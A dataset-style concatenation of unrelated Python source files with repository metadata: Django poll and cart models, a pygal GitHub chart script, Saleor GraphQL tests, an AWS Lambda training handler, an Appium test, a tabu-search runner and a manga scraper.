        self.rl_type = ""
        self.uuid = ""
        # Any keyword argument overrides the matching attribute.
        for attr_name, attr_value in kwargs.items():
            setattr(self, attr_name, attr_value)
| [
"doug@parksidesoftware.com"
] | doug@parksidesoftware.com |
824b24517c09d539722766485dba21e97ce02513 | c2a03f1cdc338c9078534d8eb2213b214a251e73 | /Pollapp/models.py | 1f700be8d88cd216b815efd7141c4ea87d9d0ca1 | [] | no_license | risification/onlinde_test | 9a2db6a945734cc74ee8bc8408ac0ce39fa9d3b3 | 3e1e7e5aca4fa59db08f6394c85ce00652c0871b | refs/heads/master | 2023-03-14T08:24:53.574738 | 2021-03-05T17:22:08 | 2021-03-05T17:22:08 | 344,850,651 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 723 | py | from django.db import models
from datetime import date
# Create your models here.
class Poll(models.Model):
    """A test/poll with a display name, auto-set creation date and a score."""
    name = models.CharField(max_length=30)
    date = models.DateField(auto_now_add=True)
    points = models.IntegerField(default=0)
class Question(models.Model):
    """One question of a Poll; ``true_answer`` stores the correct answer text."""
    poll = models.ForeignKey(Poll, on_delete=models.CASCADE)
    title = models.CharField(max_length=50)
    true_answer = models.CharField(max_length=30)
class ChoiceAnsw(models.Model):
    """A selectable answer option offered for a Question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    choice = models.CharField(max_length=40)
class Answer(models.Model):
    """An answer submitted for a Question."""
    question = models.ForeignKey(Question, on_delete=models.CASCADE)
    answer = models.CharField(max_length=30)
| [
"sultangaziev01@bk.ru"
] | sultangaziev01@bk.ru |
df168a8023119311931f1cfac20f2fad47c90e2e | 19fa45bfc16ba8c4856c0c4de8a9491714e77c3c | /PythonLearningDemo/python_repos.py | a9c7a3f44e41344106bc87e5940b77fd2afdb8fc | [] | no_license | JoyUCUU/QA | 046971d84d13b75155b91201267f7374e93d30cf | acff032c481be1483e05cf478bb6f07039c4048f | refs/heads/master | 2021-01-18T12:54:46.219302 | 2018-07-23T12:10:59 | 2018-07-23T12:10:59 | 84,333,986 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,517 | py | import requests
import requests
import pygal
from pygal.style import LightColorizedStyle as LCS, LightenStyle as LS

# Fixes vs. the original: removed the duplicated `import requests`, deleted
# dead commented-out code, and translated the comments to English.

# Make the API call and store the response.
url = 'https://api.github.com/search/repositories?q=language:python&sort=stars'
r = requests.get(url)
print("Status Code: ", r.status_code)

# Store the API response in a dict.
response_dict = r.json()
print("Total repositories:", response_dict['total_count'])

# Explore information about the returned repositories.
repo_dicts = response_dict['items']
print("Repositories returned:", len(repo_dicts))

# Build the chart data: repo names on the x axis, one value/link/tooltip
# dict per repository.
names, plot_dicts = [], []
for repo_dict in repo_dicts:
    names.append(repo_dict['name'])
    plot_dict = dict(value=repo_dict['stargazers_count'],
                     xlink=repo_dict['html_url'],
                     label=repo_dict['description'])
    plot_dicts.append(plot_dict)

# Visualization: interactive bar chart of stars per project.
my_style = LS('#333366', base_style=LCS)
chart = pygal.Bar(style=my_style, x_label_rotation=45, show_legend=False)
chart.title = "Most-starred Python Project on GitHub"
chart.x_labels = names
chart.add('', plot_dicts)
chart.render_to_file('python_repos1.svg')
| [
"your_email@youremail.com"
] | your_email@youremail.com |
b0162723ed29495537ea9a9eec04cca7e4c319e7 | 3a533d1503f9a1c767ecd3a29885add49fff4f18 | /saleor/graphql/tax/tests/queries/test_tax_configuration.py | 73297b2699c9d21b07e645750f303df73f7fd48c | [
"BSD-3-Clause"
] | permissive | jonserna/saleor | 0c1e4297e10e0a0ce530b5296f6b4488f524c145 | b7d1b320e096d99567d3fa7bc4780862809d19ac | refs/heads/master | 2023-06-25T17:25:17.459739 | 2023-06-19T14:05:41 | 2023-06-19T14:05:41 | 186,167,599 | 0 | 0 | BSD-3-Clause | 2019-12-29T15:46:40 | 2019-05-11T18:21:31 | TypeScript | UTF-8 | Python | false | false | 3,467 | py | import graphene
from saleor.tax.models import TaxConfiguration
from ....tests.utils import assert_no_permission, get_graphql_content
from ..fragments import TAX_CONFIGURATION_FRAGMENT
QUERY = (
"""
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
...TaxConfiguration
}
}
"""
+ TAX_CONFIGURATION_FRAGMENT
)
def _test_field_resolvers(tax_configuration: TaxConfiguration, data: dict):
    """Assert that the GraphQL payload *data* mirrors *tax_configuration*."""
    exceptions = tax_configuration.country_exceptions.all()
    first_exception = exceptions[0]
    expected_id = graphene.Node.to_global_id(
        "TaxConfiguration", tax_configuration.pk
    )
    assert data["id"] == expected_id
    assert data["chargeTaxes"] == tax_configuration.charge_taxes
    assert data["displayGrossPrices"] == tax_configuration.display_gross_prices
    assert data["pricesEnteredWithTax"] == tax_configuration.prices_entered_with_tax
    assert len(data["countries"]) == len(exceptions)
    first_country = data["countries"][0]
    assert first_country["country"]["code"] == first_exception.country.code
    assert first_country["chargeTaxes"] == first_exception.charge_taxes
    assert (
        first_country["displayGrossPrices"]
        == first_exception.display_gross_prices
    )
def test_tax_configuration_query_no_permissions(channel_USD, user_api_client):
    """A regular user without permissions must not read tax configuration."""
    # given
    # Renamed from `id`, which shadowed the builtin.
    tax_config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": tax_config_id}

    # when
    response = user_api_client.post_graphql(QUERY, variables, permissions=[])

    # then
    assert_no_permission(response)
def test_tax_configuration_query_staff_user(channel_USD, staff_api_client):
    """A staff user can query a channel's tax configuration."""
    # given
    # Renamed from `id`, which shadowed the builtin.
    tax_config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": tax_config_id}

    # when
    response = staff_api_client.post_graphql(QUERY, variables)

    # then
    content = get_graphql_content(response)
    _test_field_resolvers(
        channel_USD.tax_configuration, content["data"]["taxConfiguration"]
    )
def test_tax_configuration_query_app(channel_USD, app_api_client):
    """An app client can query a channel's tax configuration."""
    # given
    # Renamed from `id`, which shadowed the builtin.
    tax_config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": tax_config_id}

    # when
    response = app_api_client.post_graphql(QUERY, variables)

    # then
    content = get_graphql_content(response)
    _test_field_resolvers(
        channel_USD.tax_configuration, content["data"]["taxConfiguration"]
    )
TAX_CONFIGURATION_PRIVATE_METADATA_QUERY = """
query TaxConfiguration($id: ID!) {
taxConfiguration(id: $id) {
id
privateMetadata {
key
value
}
}
}
"""
def test_tax_class_private_metadata_requires_manage_taxes_app(
    app_api_client, channel_USD, permission_manage_taxes
):
    """Private metadata is readable with the MANAGE_TAXES permission.

    NOTE(review): the name says "tax_class" but the body queries a
    TaxConfiguration — presumably a copy/paste slip; kept unchanged so test
    selection by name is unaffected.
    """
    # given
    # Renamed from `id`, which shadowed the builtin.
    tax_config_id = graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    variables = {"id": tax_config_id}

    # when
    response = app_api_client.post_graphql(
        TAX_CONFIGURATION_PRIVATE_METADATA_QUERY,
        variables,
        permissions=[permission_manage_taxes],
    )

    # then
    content = get_graphql_content(response)
    data = content["data"]["taxConfiguration"]
    assert data["id"] == graphene.Node.to_global_id(
        "TaxConfiguration", channel_USD.tax_configuration.pk
    )
    assert data["privateMetadata"]
"noreply@github.com"
] | jonserna.noreply@github.com |
923fbbb3366566898a71cf15294ef39fc1dc4139 | 6d0f6cc613c6f1a61b787c8cc1ef9a20895be40c | /django-cielo-exemplo/apps/carrinho/cart.py | 2568e3f07c18169eeefc6fa2e5797e2ed6b0e6dc | [
"Apache-2.0"
] | permissive | vitorh45/django-ecommerce-exemplo1 | 7f3f4887a118439b8de305044392e9baa381cf23 | c033ff2eca70230f676f8bd95d0bd5ecd89948a4 | refs/heads/master | 2016-09-15T18:42:38.600694 | 2013-09-08T05:23:26 | 2013-09-08T05:23:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,958 | py | # -*- coding: utf-8 -*-
import datetime
import models
from django.utils.formats import number_format
from apps.cart import Cart as Cart_
from apps.cart.models import Cart, Item
class CustomCart(Cart_):
    """Cart subclass with size-aware items plus total price/weight helpers."""

    def add(self, product, size, quantity=1):
        """Add *quantity* units of *product* in *size* to the cart.

        Increments the quantity of an existing (product, size) item;
        otherwise creates a new Item, using the promotional price when the
        product is on sale.
        """
        try:
            item = models.Item.objects.get(
                cart=self.cart,
                product=product,
                size=size,
            )
            item.quantity += quantity
            item.save()
        except models.Item.DoesNotExist:
            item = models.Item()
            item.cart = self.cart
            item.product = product
            item.quantity = quantity
            item.size = size
            if product.em_promocao:
                item.unity_price = product.preco_promocao
            else:
                # BUG FIX: the original referenced the undefined name
                # ``produto`` here, raising NameError for every
                # non-promotional product.
                item.unity_price = product.preco
            item.save()

    def verificar_quantidade(self, produto, tamanho):
        """Return the stored quantity for (produto, tamanho), or 0."""
        # NOTE(review): this query uses ``carrinho``/``produto``/``tamanho``
        # field names while ``add`` uses ``cart``/``product``/``size`` —
        # presumably leftovers of a partial translation; confirm the Item
        # model's real field names.
        try:
            item = models.Item.objects.get(carrinho=self.carrinho,
                                           produto=produto,
                                           tamanho=tamanho)
            return item.quantidade
        except Exception:
            # Best-effort lookup: any failure is reported as "none in cart".
            return 0

    def preco_total(self):
        """Return the total price of every item in the cart."""
        total = 0
        for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
            total += item.preco_total
        return total

    def preco_total_formatado(self):
        """Return the total price formatted with two decimal places."""
        # Reuses preco_total() instead of duplicating the aggregation loop.
        return number_format(self.preco_total(), 2)

    def peso_total(self):
        """Return the total shipping weight (unit weight x quantity)."""
        total = 0
        for item in models.Item.objects.select_related().filter(carrinho=self.carrinho):
            total += item.product.peso * item.quantity
        return total

    def quantidade(self):
        """Return the number of distinct items in the cart."""
        # BUG FIX: the original computed the length but never returned it.
        return len(self.cart.item_set.all())
| [
"vitorh45@gmail.com"
] | vitorh45@gmail.com |
53503ee1218375df372c3de772acf5ad34434c8e | 372f1aa2cf1d7091d3c8116dfeb9284d9630cfa0 | /examples/lambda/s3/dl_s3_trial.py | ac1e6e176843b3dbfd27a1dfb07878af5c8aa996 | [
"Apache-2.0"
] | permissive | NLGithubWP/LambdaML | 8dbb3c4355aa899708cdefa5415659d0a950868e | 0afca7819e08632ba116fec8e102084e4040a47a | refs/heads/master | 2023-09-04T11:32:40.141624 | 2021-10-25T11:38:10 | 2021-10-25T11:38:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,095 | py | import os
import time
import math
import numpy as np
import pickle
import json
import torch
from torch.autograd import Variable
import torch.nn.functional as F
import boto3
from utils.constants import Prefix, MLModel, Optimization, Synchronization
from storage import S3Storage
from communicator import S3Communicator
from storage import DynamoTable
from storage.dynamo import dynamo_operator
from model import deep_models
from utils.metric import Accuracy, Average
def handler(event, context):
    """AWS Lambda entry point for one round of distributed model training.

    Downloads train/test sets from S3, optionally restores a checkpoint,
    runs up to ``run_epochs`` epochs with S3-based gradient/weight exchange,
    then either re-invokes itself asynchronously for the next round or, on
    the final round, records the result in DynamoDB (worker 0 only).
    """
    start_time = time.time()
    # dataset setting
    train_file = event['train_file']
    test_file = event['test_file']
    data_bucket = event['data_bucket']
    # NOTE(review): n_features/n_classes are never used in this body; they
    # are only forwarded in the re-invocation payload below.
    n_features = event['n_features']
    n_classes = event['n_classes']
    n_workers = event['n_workers']
    worker_index = event['worker_index']
    tmp_bucket = event['tmp_bucket']
    merged_bucket = event['merged_bucket']
    cp_bucket = event['cp_bucket']
    # training setting
    model_name = event['model']
    optim = event['optim']
    sync_mode = event['sync_mode']
    assert model_name.lower() in MLModel.Deep_Models
    assert optim.lower() in Optimization.All
    assert sync_mode.lower() in Synchronization.All
    # hyper-parameter
    learning_rate = event['lr']
    batch_size = event['batch_size']
    n_epochs = event['n_epochs']
    start_epoch = event['start_epoch']
    run_epochs = event['run_epochs']
    function_name = event['function_name']
    print('data bucket = {}'.format(data_bucket))
    print("train file = {}".format(train_file))
    print("test file = {}".format(test_file))
    print('number of workers = {}'.format(n_workers))
    print('worker index = {}'.format(worker_index))
    print('model = {}'.format(model_name))
    print('optimization = {}'.format(optim))
    print('sync mode = {}'.format(sync_mode))
    print('start epoch = {}'.format(start_epoch))
    print('run epochs = {}'.format(run_epochs))
    print("Run function {}, round: {}/{}, epoch: {}/{} to {}/{}"
          .format(function_name, int(start_epoch/run_epochs) + 1, math.ceil(n_epochs / run_epochs),
                  start_epoch + 1, n_epochs, start_epoch + run_epochs, n_epochs))
    storage = S3Storage()
    communicator = S3Communicator(storage, tmp_bucket, merged_bucket, n_workers, worker_index)
    # download file from s3
    local_dir = "/tmp"
    read_start = time.time()
    storage.download(data_bucket, train_file, os.path.join(local_dir, train_file))
    storage.download(data_bucket, test_file, os.path.join(local_dir, test_file))
    print("download file from s3 cost {} s".format(time.time() - read_start))
    train_set = torch.load(os.path.join(local_dir, train_file))
    test_set = torch.load(os.path.join(local_dir, test_file))
    train_loader = torch.utils.data.DataLoader(train_set, batch_size=batch_size, shuffle=True)
    test_loader = torch.utils.data.DataLoader(test_set, batch_size=100, shuffle=False)
    # NOTE(review): `classes` is unused — kept from the CIFAR-10 example.
    classes = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
    print("read data cost {} s".format(time.time() - read_start))
    # Fixed seed so every worker builds the same initial model.
    random_seed = 100
    torch.manual_seed(random_seed)
    device = 'cpu'
    net = deep_models.get_models(model_name).to(device)
    # Loss and Optimizer
    # Softmax is internally computed.
    # Set parameters to be updated.
    optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
    # load checkpoint model if it is not the first round
    if start_epoch != 0:
        checked_file = 'checkpoint_{}.pt'.format(start_epoch - 1)
        storage.download(cp_bucket, checked_file, os.path.join(local_dir, checked_file))
        checkpoint_model = torch.load(os.path.join(local_dir, checked_file))
        net.load_state_dict(checkpoint_model['model_state_dict'])
        optimizer.load_state_dict(checkpoint_model['optimizer_state_dict'])
        print("load checkpoint model at epoch {}".format(start_epoch - 1))
    for epoch in range(start_epoch, min(start_epoch + run_epochs, n_epochs)):
        train_loss, train_acc = train_one_epoch(epoch, net, train_loader, optimizer, worker_index,
                                                communicator, optim, sync_mode)
        test_loss, test_acc = test(epoch, net, test_loader)
        print('Epoch: {}/{},'.format(epoch + 1, n_epochs),
              'train loss: {}'.format(train_loss),
              'train acc: {},'.format(train_acc),
              'test loss: {}'.format(test_loss),
              'test acc: {}.'.format(test_acc), )
    if worker_index == 0:
        storage.clear(tmp_bucket)
        storage.clear(merged_bucket)
    # training is not finished yet, invoke next round
    # NOTE(review): `epoch` here is the loop variable after the loop —
    # this assumes run_epochs >= 1 so the loop executed at least once.
    if epoch < n_epochs - 1:
        checkpoint_model = {
            'epoch': epoch,
            'model_state_dict': net.state_dict(),
            'optimizer_state_dict': optimizer.state_dict(),
            'loss': train_loss.average
        }
        checked_file = 'checkpoint_{}.pt'.format(epoch)
        if worker_index == 0:
            torch.save(checkpoint_model, os.path.join(local_dir, checked_file))
            storage.upload_file(cp_bucket, checked_file, os.path.join(local_dir, checked_file))
            print("checkpoint model at epoch {} saved!".format(epoch))
        print("Invoking the next round of functions. round: {}/{}, start epoch: {}, run epoch: {}"
              .format(int((epoch + 1) / run_epochs) + 1, math.ceil(n_epochs / run_epochs),
                      epoch + 1, run_epochs))
        # Asynchronous self re-invocation with the same configuration,
        # advancing only start_epoch.
        lambda_client = boto3.client('lambda')
        payload = {
            'train_file': event['train_file'],
            'test_file': event['test_file'],
            'data_bucket': event['data_bucket'],
            'n_features': event['n_features'],
            'n_classes': event['n_classes'],
            'n_workers': event['n_workers'],
            'worker_index': event['worker_index'],
            'tmp_bucket': event['tmp_bucket'],
            'merged_bucket': event['merged_bucket'],
            'cp_bucket': event['cp_bucket'],
            'model': event['model'],
            'optim': event['optim'],
            'sync_mode': event['sync_mode'],
            'lr': event['lr'],
            'batch_size': event['batch_size'],
            'n_epochs': event['n_epochs'],
            'start_epoch': epoch + 1,
            'run_epochs': event['run_epochs'],
            'function_name': event['function_name']
        }
        lambda_client.invoke(FunctionName=function_name,
                             InvocationType='Event',
                             Payload=json.dumps(payload))
    elif worker_index == 0:
        # write record to dynamodb table
        recorder_table_name = "recoder"
        dynamo_client = dynamo_operator.get_client()
        recorder_tb = DynamoTable(dynamo_client, recorder_table_name)
        recorder_tb.save("{},{}".format(test_loss, test_acc), learning_rate, "learning_rate")
    end_time = time.time()
    print("Elapsed time = {} s".format(end_time - start_time))
# Train
def train_one_epoch(epoch, net, train_loader, optimizer, worker_index,
                    communicator, optim, sync_mode):
    """Train one epoch, synchronizing via S3 according to optim/sync_mode.

    optim == "grad_avg": gradients are merged every batch (or weights, in
    "async" mode) before/instead of the local optimizer step.
    optim == "model_avg": only the weights are merged once, after the epoch.
    Returns (train_loss, train_acc) meter objects.
    """
    assert isinstance(communicator, S3Communicator)
    net.train()
    epoch_start = time.time()
    epoch_cal_time = 0
    epoch_comm_time = 0
    train_acc = Accuracy()
    train_loss = Average()
    for batch_idx, (inputs, targets) in enumerate(train_loader):
        batch_start = time.time()
        outputs = net(inputs)
        loss = F.cross_entropy(outputs, targets)
        optimizer.zero_grad()
        loss.backward()
        batch_cal_time = time.time() - batch_start
        batch_comm_time = 0
        if optim == "grad_avg":
            if sync_mode == "reduce" or sync_mode == "reduce_scatter":
                grads = [param.grad.data.numpy() for param in net.parameters()]
                batch_cal_time = time.time() - batch_start
                epoch_cal_time += batch_cal_time
                batch_comm_start = time.time()
                postfix = "{}_{}".format(epoch, batch_idx)
                # NOTE(review): both branches call the same method — the
                # reduce_scatter branch presumably meant a different call.
                if sync_mode == "reduce":
                    merged_grads = communicator.reduce_batch_nn(pickle.dumps(grads), postfix)
                elif sync_mode == "reduce_scatter":
                    merged_grads = communicator.reduce_batch_nn(pickle.dumps(grads), postfix)
                for layer_index, param in enumerate(net.parameters()):
                    param.grad.data = torch.from_numpy(merged_grads[layer_index])
                batch_comm_time = time.time() - batch_comm_start
                print("one {} round cost {} s".format(sync_mode, batch_comm_time))
                epoch_comm_time += batch_comm_time
            elif sync_mode == "async":
                # async does step before sync
                optimizer.step()
                batch_cal_time = time.time() - batch_start
                epoch_cal_time += batch_cal_time
                batch_comm_start = time.time()
                weights = [param.data.numpy() for param in net.parameters()]
                new_weights = communicator.async_reduce_nn(pickle.dumps(weights), Prefix.w_b_prefix)
                for layer_index, param in enumerate(net.parameters()):
                    param.data = torch.from_numpy(new_weights[layer_index])
                batch_comm_time = time.time() - batch_comm_start
                print("one {} round cost {} s".format(sync_mode, batch_comm_time))
                epoch_comm_time += batch_comm_time
        # async does step before sync
        if sync_mode != "async":
            step_start = time.time()
            optimizer.step()
            batch_cal_time += time.time() - step_start
            epoch_cal_time += batch_cal_time
        train_acc.update(outputs, targets)
        train_loss.update(loss.item(), inputs.size(0))
        if batch_idx % 10 == 0:
            print("Epoch: [{}], Batch: [{}], train loss: {}, train acc: {}, batch cost {} s, "
                  "cal cost {} s, comm cost {} s"
                  .format(epoch + 1, batch_idx + 1, train_loss, train_acc, time.time() - batch_start,
                          batch_cal_time, batch_comm_time))
    if optim == "model_avg":
        # Merge the full weight vectors once per epoch.
        weights = [param.data.numpy() for param in net.parameters()]
        epoch_cal_time += time.time() - epoch_start
        epoch_sync_start = time.time()
        postfix = str(epoch)
        if sync_mode == "reduce":
            merged_weights = communicator.reduce_epoch_nn(pickle.dumps(weights), postfix)
        elif sync_mode == "reduce_scatter":
            merged_weights = communicator.reduce_epoch_nn(pickle.dumps(weights), postfix)
        elif sync_mode == "async":
            merged_weights = communicator.async_reduce_nn(pickle.dumps(weights), Prefix.w_b_prefix)
        for layer_index, param in enumerate(net.parameters()):
            param.data = torch.from_numpy(merged_weights[layer_index])
        print("one {} round cost {} s".format(sync_mode, time.time() - epoch_sync_start))
        epoch_comm_time += time.time() - epoch_sync_start
    # Worker 0 cleans up S3 objects from earlier synchronization rounds.
    if worker_index == 0:
        delete_start = time.time()
        # model avg delete by epoch
        if optim == "model_avg" and sync_mode != "async":
            communicator.delete_expired_epoch(epoch)
        elif optim == "grad_avg" and sync_mode != "async":
            communicator.delete_expired_batch(epoch, batch_idx)
        epoch_comm_time += time.time() - delete_start
    # NOTE(review): `batch_idx` after the loop assumes the loader yielded at
    # least one batch.
    print("Epoch {} has {} batches, cost {} s, cal time = {} s, comm time = {} s"
          .format(epoch + 1, batch_idx, time.time() - epoch_start, epoch_cal_time, epoch_comm_time))
    return train_loss, train_acc
def test(epoch, net, test_loader):
    """Evaluate *net* on *test_loader*; return (loss meter, accuracy meter)."""
    net.eval()
    loss_meter = Average()
    acc_meter = Accuracy()
    # No gradients needed during evaluation.
    with torch.no_grad():
        for inputs, targets in test_loader:
            outputs = net(inputs)
            batch_loss = F.cross_entropy(outputs, targets)
            loss_meter.update(batch_loss.item(), inputs.size(0))
            acc_meter.update(outputs, targets)
    return loss_meter, acc_meter
| [
"blue.jwjiang@gmail.com"
] | blue.jwjiang@gmail.com |
1babc7072766b27347596ff016edc48801b231a5 | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/timber/testcase/firstcases/testcase2_014.py | be622f71f51754baf60fa67975a8405d081d50d6 | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,766 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
# Appium capabilities for the Timber app under JaCoCo instrumentation.
desired_caps = {
    'platformName' : 'Android',
    'deviceName' : 'Android Emulator',
    'platformVersion' : '4.4',
    'appPackage' : 'com.naman14.timber',
    'appActivity' : 'com.naman14.timber.activities.MainActivity',
    'resetKeyboard' : True,
    'androidCoverage' : 'com.naman14.timber/com.naman14.timber.JacocoInstrumentation',
    'noReset' : True
}
def command(cmd, timeout=5):
    """Run *cmd* in a shell, wait *timeout* seconds, then terminate it."""
    proc = subprocess.Popen(cmd, stderr=subprocess.STDOUT,
                            stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    proc.terminate()
    return
def getElememt(driver, str):
    """Find an element by uiautomator selector, retrying up to 5 times.

    Sleeps 1s between attempts; as a last resort taps (50, 50) to wake the
    screen and retries once more, propagating NoSuchElementException if the
    element still cannot be found.
    """
    # Idiom fix: range(0, 5, 1) -> range(5); unused loop variable -> _.
    for _ in range(5):
        try:
            element = driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str)
    return element
def getElememtBack(driver, str1, str2):
    """Find an element by selector *str1* (2 attempts), then *str2* (5).

    Sleeps 1s between attempts; as a last resort taps (50, 50) and retries
    *str2* once more, propagating NoSuchElementException on failure.
    """
    # Idiom fix: range(0, N, 1) -> range(N); unused loop variable -> _.
    for _ in range(2):
        try:
            element = driver.find_element_by_android_uiautomator(str1)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    for _ in range(5):
        try:
            element = driver.find_element_by_android_uiautomator(str2)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")
    element = driver.find_element_by_android_uiautomator(str2)
    return element
def swipe(driver, startxper, startyper, endxper, endyper) :
    """Swipe across the screen using fractional (0..1) coordinates.

    The fractions are scaled by the current window size.  A failed swipe
    (WebDriverException) is retried once after a one-second pause; a second
    failure propagates.
    """
    size = driver.get_window_size()
    start_x = int(size["width"] * startxper)
    start_y = int(size["height"] * startyper)
    end_x = int(size["width"] * endxper)
    end_y = int(size["height"] * endyper)
    try:
        driver.swipe(start_x=start_x, start_y=start_y, end_x=end_x,
                     end_y=end_y, duration=2000)
    except WebDriverException:
        time.sleep(1)
        driver.swipe(start_x=start_x, start_y=start_y, end_x=end_x,
                     end_y=end_y, duration=2000)
    return
# testcase014
# Launch the app via Appium, press BACK (keycode 4), and record timing plus
# JaCoCo coverage regardless of success.  (Python 2 syntax.)
try :
    starttime = time.time()
    driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
    driver.press_keycode(4)  # KEYCODE_BACK
except Exception, e:
    print 'FAIL'
    print 'str(e):\t\t', str(e)
    print 'repr(e):\t', repr(e)
    print traceback.format_exc()
else:
    print 'OK'
finally:
    # NOTE(review): if webdriver.Remote() itself failed, `driver` (and
    # `starttime`) are undefined here and this block raises NameError.
    cpackage = driver.current_package
    endtime = time.time()
    print 'consumed time:', str(endtime - starttime), 's'
    # Ask the instrumented app to dump coverage for this test case.
    command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"2_014\"")
    jacocotime = time.time()
    print 'jacoco time:', str(jacocotime - endtime), 's'
    driver.quit()
    if (cpackage != 'com.naman14.timber'):
        cpackage = "adb shell am force-stop " + cpackage
os.popen(cpackage) | [
"prefest2018@gmail.com"
] | prefest2018@gmail.com |
222685f51ec56d50a935508b87c66af2db694e28 | 396f93d8e73c419ef82a94174815a2cecbb8334b | /.history/tester2_20200322005203.py | dc127637a831840c9f18cc1ca90688e8540b41dc | [] | no_license | mirfarzam/ArtificialIntelligence-HeuristicAlgorithm-TabuSearch | 8c73d9448b916009c9431526864a4441fdeb682a | 90b2dca920c85cddd7c1b3335344ac7b10a9b061 | refs/heads/master | 2021-03-26T21:16:42.561068 | 2020-04-17T21:44:26 | 2020-04-17T21:44:26 | 247,750,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,014 | py | import os
import subprocess
import re
from datetime import datetime
import time
from statistics import mean
# Repeatedly run the external tabu-search solver and summarise how often
# (and how quickly) it reaches the known optimum tour.
numberOfTests = 1000
tabuIteration = '1000'   # solver iterations (the CLI takes strings)
tabuDuration = '10'      # tabu tenure (memory duration)
numberOfCities = '50'
final_solution = []      # best tour length reported by each run
list_coverage = []       # iteration at which each run converged
local_minimum = []       # solutions of runs that reported a local minimum
print(f"\n\nTest for Tabu Search with this config: \n\tIterations : {tabuIteration} \n\tDuration(Tabu Memory): {tabuDuration} \n\tNumber of Cities: {numberOfCities}")
for i in range(0, numberOfTests):
    process = subprocess.Popen(['./algo_tabou.exe', tabuIteration , tabuDuration, numberOfCities, 'distances_entre_villes_{}.txt'.format(numberOfCities)],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
    stdout, stderr = process.communicate()
    # Flatten whitespace so the regexes below can scan the whole output.
    result = re.sub(r'\s', ' ', str(stdout))
    # The last "<n> km" occurrence is the solver's final/best tour length.
    solution = (re.findall(r'([0-9]{4,7}) km', result))[-1]
    final_solution.append(int(solution))
    coverage = re.findall(r'On est dans un minimum local a l\'iteration ([0-9]+) ->', result)
    if coverage != []:
        coverage = int(coverage[0])+ 1
        local_minimum.append(int(solution))
    else:
        # No local-minimum message: assume the run used every iteration.
        coverage = int(tabuIteration)
    number_of_solution_before_coverage = coverage
    list_coverage.append(coverage)
    print('best found solution is {} and found in interation {}, number of solutions before coverage : {}'.format(solution, coverage, number_of_solution_before_coverage))
    time.sleep( 1 )
print("Summary:")
# 5644 is treated as the known optimum tour length for this instance.
optimum_result = len(list(filter(lambda x: x == 5644, final_solution)))
print(f'number of optimum solution found is {optimum_result}, so in {numberOfTests} runs of test we faced {(optimum_result/numberOfTests)*100}% coverage')
# BUGFIX: the "best case" figure previously reused max(); best case is min().
print(f'in average this test shows that we found the global optimum solution in iteration {mean(list_coverage)}\nand in worst we found it in iteration {max(list_coverage)} \nand in best case in iteration {min(list_coverage)}')
print(f'Totally, {sum(list_coverage)} cities visited before finding the global optimum in {numberOfTests} runs of this test\n\n\n')
print(f'') | [
"farzam.mirmoeini@gmail.com"
] | farzam.mirmoeini@gmail.com |
f3e047c6d5a259010568b73807716e530bc4005d | 3481023b43028c5ee9520a8be0978e914bdcb548 | /manga_py/providers/mang_as.py | 27238087ebc8dca9f1a40bcd29d161ac214b695c | [
"MIT"
] | permissive | manga-py/manga-py | 18f6818d8efc96c3e69efee7dff3f3d6c773e32a | 0db97123acab1f2fb99e808b0ba54db08977e5c8 | refs/heads/stable_1.x | 2023-08-20T03:04:06.373108 | 2023-04-16T08:28:15 | 2023-04-16T08:28:15 | 98,638,892 | 444 | 56 | MIT | 2023-07-27T13:21:40 | 2017-07-28T10:27:43 | Python | UTF-8 | Python | false | false | 1,185 | py | from sys import stderr
from manga_py.provider import Provider
from .helpers.std import Std
class MangAs(Provider, Std):
    """manga-py provider: scrapes chapter, page, and cover data."""

    def get_chapter_index(self) -> str:
        """Second path component under /manga/, with dots mapped to dashes."""
        match = self.re.search('/manga/[^/]+/([^/]+)', self.chapter)
        return match.group(1).replace('.', '-')

    def get_content(self):
        """Fetch the manga landing page."""
        return self._get_content('{}/manga/{}')

    def get_manga_name(self) -> str:
        """Manga slug taken from the URL path."""
        return self._get_name('/manga/([^/]+)')

    def get_chapters(self):
        """Chapter links from the chapter list."""
        return self._elements('.chapter-title-rtl > a')

    def get_files(self):
        """Extract page-image URLs from the inline `var pages = [...]` JSON."""
        html = self.http_get(self.chapter)
        self.http().referer = self.chapter
        match = self.re.search(r'var\s+pages\s*=\s*(\[.+\])', html)
        if match is None:
            self.log('Images not found!', file=stderr)
            return []
        normalize = self.normalize_uri
        pages = self.json.loads(match.group(1))
        return [normalize(page.get('page_image')) for page in pages]

    def prepare_cookies(self):
        self._base_cookies(self.get_url())

